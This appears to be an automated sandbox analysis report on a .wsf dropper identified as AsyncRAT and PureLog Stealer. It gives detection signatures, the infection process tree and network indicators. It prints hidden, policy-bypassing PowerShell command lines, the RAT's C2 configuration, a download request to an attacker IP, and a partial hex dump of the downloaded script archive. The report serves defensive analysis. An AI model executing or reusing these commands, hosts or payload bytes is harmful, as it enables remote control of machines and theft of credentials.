
Windows Analysis Report
Summaryform_FXnbLLyKOJ.wsf

Overview

General Information

Sample name: Summaryform_FXnbLLyKOJ.wsf
Analysis ID: 1409058
MD5: 75dc4de3834d7a713ca0e33c3d1c9b1b
SHA1: 7b197014208a3aadcadd571f4ced60eb4acbefdc
SHA256: f8a6ff7847a05d31933deb7386190372bbe6a8af3bfde04b757731341d9ac4a3

Detection

AsyncRAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected BrowserPasswordDump
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Found suspicious ZIP file
Injects a PE file into a foreign processes
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4552 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3360 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 4044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • net.exe (PID: 5864 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net1.exe (PID: 5048 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5024 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 2096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 1216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 1176 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 6672 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 1484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4156 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 7104 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 2304 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 5484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7092 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 5040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5968 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 3872 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 64 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware configuration (AsyncRAT): {"Ports": ["6666"], "Server": ["shefonew07.ddns.net"], "Mutex": "AsyncMutex_dHCTyo6u65FEkSZ3", "Certificate": "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", "Server Signature": "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"}
Source | Rule | Description | Author | Strings
Source: dump.pcap | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x3d031:$x1: AsyncRAT
  • 0x3d06f:$x1: AsyncRAT

Source | Rule | Description | Author | Strings
Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x465b:$x1: AsyncRAT
  • 0x4699:$x1: AsyncRAT
Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x1835b:$x1: AsyncRAT
  • 0x18399:$x1: AsyncRAT
Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_Asyncrat_11a11ba1 | Description: unknown | Author: unknown
  • 0x1e1e4:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x21278:$a2: Stub.exe
  • 0x21308:$a2: Stub.exe
  • 0x1aa74:$a3: get_ActivatePong
  • 0x1e3fc:$a4: vmware
  • 0x1e274:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x1ba0b:$a6: get_SslClient
Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Description: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
  • 0x1e276:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
(51 further memory-dump entries not shown)

Source | Rule | Description | Author | Strings
Source: 20.2.powershell.exe.13852e70000.2.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 38.2.powershell.exe.2b31f7adac0.1.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 20.2.powershell.exe.1384aa71a78.1.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
(35 further unpacked-PE entries not shown)

System Summary

Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4156, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3816, ProcessName: RegSvcs.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\nKNmegHQBbmlQMTN.bat
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 212.23.222.200, DestinationIsIpv6: false, DestinationPort: 222, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4552, TargetFilename: C:\Users\Public\NDKJPlEEYLhKqtGW.xml
Source: Process started | Author: frack113 | Data: Command: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4232, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", ProcessId: 5024, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs
Source: Network Connection | Author: frack113 | Data: DestinationIp: 212.23.222.200, DestinationIsIpv6: false, DestinationPort: 222, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", ProcessId: 4552, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4552, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ProcessId: 3360, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\DnWEdFPemZvdtKRs.ps1
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2096, ProcessName: svchost.exe
Timestamp: 03/14/24-16:35:17.108992
SID: 2035595
Source Port: 6666
Destination Port: 49711
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/14/24-16:35:17.108992
SID: 2030673
Source Port: 6666
Destination Port: 49711
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Ports": ["6666"], "Server": ["shefonew07.ddns.net"], "Mutex": "AsyncMutex_dHCTyo6u65FEkSZ3", "Certificate": "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", "Server Signature": "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"}
Source: Binary string: NewPE2.pdb source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NewPE2.pdbxf source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic | Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 103.195.101.9:6666 -> 192.168.2.6:49711
Source: Traffic | Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 103.195.101.9:6666 -> 192.168.2.6:49711
Source: C:\Windows\System32\wscript.exe | Network Connect: 212.23.222.200 222
Source: unknown | DNS query: name: shefonew07.ddns.net
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 222
Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 222
Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 222
Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49703
Source: Yara match | File source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49699 -> 212.23.222.200:222
Source: global traffic | TCP traffic: 192.168.2.6:49711 -> 103.195.101.9:6666
Source: Joe Sandbox View | ASN Name: RELIABLESITEUS RELIABLESITEUS
Source: Joe Sandbox View | ASN Name: TMRDE TMRDE
Source: global traffic | HTTP traffic detected:
  GET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 212.23.222.200:222
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 212.23.222.200 (this entry is repeated 50 times in the report)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 14 Mar 2024 15:34:54 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Thu, 07 Mar 2024 01:32:20 GMT
  ETag: "17b85-613080be7586c"
  Accept-Ranges: bytes
  Content-Length: 97157
  Keep-Alive: timeout=5, max=99
  Connection: Keep-Alive
  Content-Type: image/jpeg
  Data Raw: 50 4b 03 04 14 00 00 00 08 00 c7 71 66 58 69 ec 44 a3 1d 01 00 00 55 02 00 00 18 00 00 00 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 95 92 3b 6f 83 40 10 84 fb 93 ee 3f 9c a8 1c 09 21 ea 48 29 12 82 b1 63 03 e1 e1 38 05 0d 8f c5 10 c1 81 ef 81 30 bf 3e d8 58 29 30 4d da d9 bd 99 6f b4 e7 52 62 32 d6 30 e2 03 97 35 10 07 7a 81 d1 7b 59 93 7c f0 84 94 dd 9e c1 65 13 da eb 72 52 2f ed e9 63 6f b9 67 bf 3b 08 d3 fe ea 26 35 6c dd f8 b5 e9 cf e5 60 15 14 76 06 46 f3 3d f2 42 d6 71 c5 01 a3 f9 ee 38 d1 31 0a 40 3c 24 8e 13 83 41 2c c0 4d 7e 20 15 2b e5 18 a4 ac 6c 85 16 14 50 55 ca d3 9d e8 fb b8 ce 8a e1 18 f8 b6 37 74 83 89 d1 5c 19 7d 14 3a fa 73 e0 bc 6c a8 b2 c8 30 0f d7 7c 49 57 73 27 95 e8 2a 09 99 84 31 7b 9b 93 a5 2a 24 2c 80 2e f6 bf be c3 c8 a4 19 d9 e6 13 3a f4 90 4a 31 22 19 4d 5d c7 34 c3 68 ae 5c d1 8d e7 e8 c0 81 f1 e8 53 26 55 99 46 74 e7 d4 70 da 78 6f 49 5d 79 76 e8 68 49 2c 94 1b cf 43 e8 c4 b2 54 ed 21 5b bd 5e c1 bc 5d e8 1f fb f7 32 7f bf c8 6a c2 86 e8 bf 50 4b 03 04 14 00 00 00 08 00 60 71 66 58 50 b6 2b 5b 66 01 00 00 1b 02 00 00 14 00 00 00 44 6e 57 45 64 46 50 65 6d 5a 76 64 74 4b 52 73 2e 70 73 31 5d 51 bb 6e eb 30 0c dd 2f d0 7f 10 8c 0e 0e d0 08 7d 00 77 30 d0 a1 75 fa c8 90 36 88 dd bb 34 1d 14 8b 71 d4 c8 52 40 d2 09 fc f7 95 14 a3 c3 d5 42 f1 71 c8 c3 c3 8b 3f 97 ed 20 ee c5 1b 9c a6 ef 9b 6f 68 58 4c 4b df 8d df aa d9 81 ee 2d c8 0a f0 68 1a 48 d5 b2 f4 ce 85 6c 3e 09 2e eb 00 8e c1 d0 a0 56 b4 cf af cf 51 b9 82 d6 10 a3 62 e3 dd dc 6d bd 9c 01 35 68 0e d1 0f 90 6c d5 3b 12 4a 9c 63 02 8e 80 83 b8 15 9d 71 3d 03 65 e7 1e 15 30 1b d7 92 7c 72 6a 63 21 8d 62 ec e1 bf ec cc 90 b2 d6 9f 2a 56 c8 f3 ed bb 7b 54 cc 80 06 28 02 b6 ca 52 44 10 27 b8 96 35 9a b6 05 24 59 22 28 86 fc 66 92 b2 32 c1 1f 7d ef b4 c2 28 c9 e7 2c 64 6b d3 c1 57 51 bc f9 93 ac 7d c5 18 06 e6 d9 10 de 74 b1 98 6a 5d bf be 16 5d 57 10 65 63 93 15 1c 80 4d 5c 52 ce 5d 20 71 54 36 6e bb ac 6f 17 71 a9 61 3f 92 78 68 62 cd 2f 87 a4 da b0 97 4b c5 bb 58 5f 16 eb 0f 0a 1c d7 cb 7e 63 4d b3 0e ea ae f4 e1 d9 20 71 8d 83 3c 6e 92 44 8e 46 f1 5f 80 9f bd d5 80 79 b6 4e 4c 1c 8d 07 00 8c 57 99 c1 d6 b8 c4 2a cf ca 1d fa 0e 3e 0e 3a cc fd 77 93 5d 45 3a 57 e2 6f b0 ae b7 f6 d7 dc 4d 7e 00 50 4b 03 04 14 00 00 00 08 00 87 71 66 58 fc 15 3f f5 1e 01 00 00 58 02 00 00 12 00 00 00 4e 65 77 52 64 70 46 69 72 73 74 54 72 79 2e 76 62 73 95 52 cf 6f 82 30 14 be 37 e1 7f 68 38 b9 c4 10 cf 4b 76 58 90 11 c8 14 10 c8 cc e2 05 e8 43 3b b1 95 b6 e0 c6 5f bf 2a 66 87 ca 65 c7 7e ef eb f7 23 ef 45 0c 7b 42 70 81 37 20 bb 13 e0 35 7c 2b 0b 2d e9 09 c7 51 15 0c 4b 22 bc 75 fb 9e b5 3f ab 11 cd 7b c1 c2 be 